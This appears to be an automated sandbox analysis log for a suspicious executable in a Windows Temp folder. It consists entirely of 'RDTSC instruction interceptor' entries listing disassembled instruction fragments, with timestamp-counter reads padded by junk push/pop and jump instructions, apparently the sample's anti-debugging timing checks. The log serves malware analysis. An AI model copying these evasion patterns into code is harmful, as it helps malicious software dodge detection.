Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121860E second address: 121861A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121861A second address: 121861E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121861E second address: 1218622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1218622 second address: 1218628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1218628 second address: 121862E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121862E second address: 1218664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F8764C3B8C5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259DE5 second address: 1259DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259DE9 second address: 1259E13 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8764C3B8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jng 00007F8764C3B8B6h 0x00000012 jmp 00007F8764C3B8BCh 0x00000017 pop esi 0x00000018 pushad 0x00000019 jng 00007F8764C3B8B6h 0x0000001f push edi 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125AAAF second address: 125AAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125AAB5 second address: 125AAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F8764C3B8B8h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125EF20 second address: 125EF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125EF26 second address: 125EF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F8764C3B8B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125EF37 second address: 125EF7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8765238CEEh 0x0000000f jmp 00007F8765238CD0h 0x00000014 jmp 00007F8765238CD8h 0x00000019 jmp 00007F8765238CCFh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125EF7D second address: 125EF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 125EF83 second address: 125EF9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F8765238CC6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121A033 second address: 121A039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121A039 second address: 121A03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121A03E second address: 121A05D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C8h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126587A second address: 1265898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD1h 0x00000007 jno 00007F8765238CC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1265898 second address: 126589D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126589D second address: 12658B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8765238CD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12658B5 second address: 12658B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12658B9 second address: 12658BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1264E66 second address: 1264E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8764C3B8B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1264E73 second address: 1264E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1264E78 second address: 1264EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8764C3B8BCh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8764C3B8C6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126510E second address: 126511B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F8765238CC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1265450 second address: 1265454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1265454 second address: 126545A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12655A6 second address: 12655CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8764C3B8C0h 0x00000010 popad 0x00000011 push edi 0x00000012 jbe 00007F8764C3B8B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1268743 second address: 1268747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1268972 second address: 126897A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126897A second address: 126897E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126897E second address: 1268993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8764C3B8BBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12691D1 second address: 12691EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1269251 second address: 126926B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126926B second address: 1269294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8765238CD6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8765238CCCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12697B7 second address: 12697BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126B786 second address: 126B7B0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8765238CCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8765238CD0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F8765238CC6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126CCF4 second address: 126CCF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126CCF9 second address: 126CCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126E207 second address: 126E20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126ED30 second address: 126ED36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126ED36 second address: 126ED3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12711AA second address: 12711C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8765238CCFh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12711C0 second address: 12711D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F8764C3B8BCh 0x00000010 jg 00007F8764C3B8B6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126BF6B second address: 126BF85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127405A second address: 1274064 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8764C3B8BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1275024 second address: 1275029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1275029 second address: 127504F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8764C3B8C9h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1276122 second address: 1276198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F8765238CC8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov ebx, eax 0x00000026 push 00000000h 0x00000028 mov edi, edx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F8765238CC8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov ebx, dword ptr [ebp+122D1916h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jg 00007F8765238CCCh 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1276198 second address: 127619F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127809C second address: 12780B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12780B6 second address: 12780BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12780BA second address: 12780C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12780C4 second address: 12780C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12780C8 second address: 127811F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8765238CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jnc 00007F8765238CCCh 0x00000012 push 00000000h 0x00000014 sub dword ptr [ebp+122D3410h], ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F8765238CC8h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov dword ptr [ebp+12478479h], edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push edx 0x00000040 jnp 00007F8765238CC6h 0x00000046 pop edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127811F second address: 1278129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8764C3B8B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1278129 second address: 127812D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1279228 second address: 127922E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127C798 second address: 127C79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127C79C second address: 127C7A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126F538 second address: 126F53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126F53C second address: 126F540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126F540 second address: 126F552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F8765238CE3h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 126F552 second address: 126F556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127E79A second address: 127E79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127E79E second address: 127E7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127E7A2 second address: 127E7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127F601 second address: 127F65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8764C3B8B6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d jl 00007F8764C3B8B8h 0x00000013 mov edi, ecx 0x00000015 sub ebx, 74A38D27h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F8764C3B8B8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F8764C3B8C8h 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127F65B second address: 127F65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12805A6 second address: 12805B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8BAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12805B4 second address: 12805B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12816B7 second address: 12816BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12816BC second address: 12816C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8765238CC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12816C6 second address: 12816CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12816CA second address: 12816DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8765238CC6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1276358 second address: 127635F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127828C second address: 1278292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1278345 second address: 1278358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1279435 second address: 1279439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
